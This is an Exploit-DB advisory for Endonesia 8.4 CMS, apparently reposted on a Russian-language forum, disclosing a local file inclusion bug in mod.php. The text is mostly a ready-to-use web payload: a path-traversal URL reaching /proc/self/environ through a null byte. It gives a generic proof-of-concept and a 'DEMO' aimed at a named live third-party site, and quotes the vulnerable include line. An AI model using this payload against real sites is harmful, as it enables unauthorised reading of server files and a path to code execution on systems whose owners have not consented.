- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9880
- Проверка EDB
-
- Пройдено
- Автор
- S4R4D0
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-11-04
Код:
[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Author: s4r4d0
[*] Mail: [email protected]
[*] Team: Fatal Error
[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off
#
# - sp3x
#
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
[*] Made in Brazil
[*] Reference: http://securityreason.com/exploitalert/7435
- Источник
- www.exploit-db.com